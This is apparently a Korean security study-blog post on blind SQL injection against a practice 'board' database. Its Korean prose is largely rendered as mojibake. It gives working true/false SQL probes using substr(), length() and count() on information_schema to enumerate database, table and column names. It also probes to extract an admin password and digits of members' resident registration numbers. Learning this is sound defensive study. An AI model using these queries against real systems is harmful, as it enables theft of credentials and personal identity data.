์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

Blind Injection -1

Blind Injection

Content based

Response based

Sequential search (try each candidate character in turn)

Binary search (halve the character-code range with each query)

Bit-operation search (one query per bit of the character code)

a๊ฐ€ ํฌํ•จ๋ผ์žˆ์ง€์•Š์•„์„œ FALSE = 0

SELECT substr((SELECT password FROM board.members WHERE id='admin'),1,1)='a';

@๊ฐ€ ํฌํ•จ๋ผ์žˆ์–ด์„œ TRUE = 1

SELECT substr((SELECT password FROM board.members WHERE id='admin'),1,1)='@';

Blind Injection ๊ณต๊ฒฉ์˜ ํ•ต์‹ฌ์€ ์ฐธ/๊ฑฐ์ง“์„ ํŒ๋ณ„ํ•˜์—ฌ ์‘๋‹ต๊ฐ’์„ ๋ฐ›๋Š” ๊ฒƒ

๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ๋งคํ•‘

 

< ์ˆœ์ฐจ ์ ‘๊ทผ >

DB์ด๋ฆ„ ๋ชฉ๋กํ™”

Table ์ด๋ฆ„ ๋ชฉ๋กํ™”

Column ์ด๋ฆ„์˜ ๋ชฉ๋กํ™”

 

< ๋น„์ˆœ์ฐจ ์ ‘๊ทผ >

๊ฐœ๋ฐœ์ž ์ž…์žฅ์—์„œ ๋ชฉ๋ก๋“ค์„ ์œ ์ถ”ํ•ด์•ผํ•œ๋‹ค

SELECT table_name FROM information_schema.tables WHERE schema_name='board' and table_name like '%mem%'

DATABASE ์ด๋ฆ„์ด board ์ด๋ฉด์„œ ํ…Œ์ด๋ธ” ์ด๋ฆ„์—์„œ %mem%์ธ๊ฒƒ

SELECT column_name FROM information_schema.columns WHERE table_schema='board' and table_name='members' and column_name like '%id%';

ํ…Œ์ด๋ธ” ์ด๋ฆ„ member์—์„œ id๊ฐ€ ๋“ค์–ด๊ฐ„ ์ปฌ๋Ÿผ

 


๋ธ”๋ผ์ธ๋“œ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™”

1. ๊ธฐ๋ณธ์ •๋ณด ๋ชฉ๋กํ™”๋ฅผ ํ†ตํ•ด์„œ ๋ฐ˜๋“œ์‹œ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„์„ ์•Œ์•„๋‚ธ๋‹ค.

1-1. ๊ธ€์ž ์ˆ˜๋ฅผ ์œ ์ถ”ํ•œ๋‹ค : length()ํ•จ์ˆ˜// ๊ฒฐ๊ณผ๋ฌผ 5๊ธ€์ž

SELECT length((SELECT database()))=1;

๊ธ€์ž์ˆ˜๊ฐ€ 5๊ธ€์ž์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

1-2. 

SELECT substr((SELECT database()),1,1)='a';

๊ธ€์ž ๋งจ ์•ž๊ธ€์ž๊ฐ€ b์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ
๋‘๋ฒˆ์งธ ๊ธ€์ž๊ฐ€ o์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

1-2. ํ•œ๊ธ€์ž์”ฉ ๋น„๊ตํ•˜์—ฌ 0(๊ฑฐ์ง“)์ด ์•„๋‹Œ 1(์ฐธ)์˜ ๊ฐ’์„ ์ฐพ๋Š”๋‹ค : ์‚ฌ์šฉํ•จ์ˆ˜ mid(),substr() // ๊ฒฐ๊ณผ๋ฌผ board

 

2. ์•Œ์•„๋‚ธ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„์„ ๊ฐ€์ง€๊ณ  ํ…Œ์ด๋ธ” ์ด๋ฆ„์„ ์œ ์ถ”ํ•œ๋‹ค.

2-1. ํ…Œ์ด๋ธ”์˜ ๊ฐœ์ˆ˜๋ฅผ ํŒŒ์•…ํ•œ๋‹ค : ์‚ฌ์šฉํ•จ์ˆ˜ count(*) // ๊ฒฐ๊ณผ 2๊ฐœ

SELECT (SELECT count(*) FROM information_schema.tables WHERE table_schema='board')=1;

BOARD์˜ ํ…Œ์ด๋ธ” ๊ฐœ์ˆ˜๊ฐ€ 2๊ฐœ์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

 

SELECT (SELECT count(*) FROM information_schema.tables WHERE table_schema='board' and table_name like '%mem%')=1;

mem์ด๋ผ๋Š” ๋‹จ์–ด๊ฐ€ ๋“ค์–ด๊ฐ„ ํ…Œ์ด๋ธ” ์ด๋ฆ„์€ 1๊ฐœ ์ธ๊ฒƒ์„ ์œ ์ถ”๊ฐ€๋Šฅ

2-2. ๊ธ€์ž์ˆ˜๋ฅผ ์œ ์ถ”ํ•œ๋‹ค : ์‚ฌ์šฉํ•จ์ˆ˜ length() // ๊ฒฐ๊ณผ 7๊ธ€์ž

SELECT length((SELECT table_name FROM information_schema.tables WHERE table_schema='board' and table_name like '%mem%'))=1;

7๊ธ€์ž์ธ๊ฒƒ์„ ์œ ์ถ” ๊ฐ€๋Šฅ

2-3. ํšŒ์› ํ…Œ์ด๋ธ”์„ ์œ ์ถ”ํ•˜์—ฌ '%mem%'์„ ์‚ฌ์šฉ : 

QUIZ ) Infer the first two digits of the members' resident registration numbers

First digit confirmed to be 8
Second digit confirmed to be 1 : admin : 81
First digit confirmed to be 8
Second digit confirmed to be 6 : gugucon : 86

SELECT password FROM members WHERE id='admin'
① SELECT (column) ② FROM (table) ③ WHERE (condition)
Logical evaluation order: ② > ③ > ①

 

3. ์œ ์ถ”ํ•œ ํ…Œ์ด๋ธ” ์ด๋ฆ„์„ ๊ฐ€์ง€๊ณ  ์ฐพ๊ณ ์‹ถ์€ ์ปฌ๋Ÿผ๋งŒ ์œ ์ถ”ํ•ด์„œ ์ฐพ์•„๋‚ธ๋‹ค.

 

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

ORACLE INJECTION  (0) 2022.07.05
Blind Injection -2  (0) 2022.07.04
oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
UNION SQL INJECTION  (0) 2022.06.30
SQL Injection  (0) 2022.06.29
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.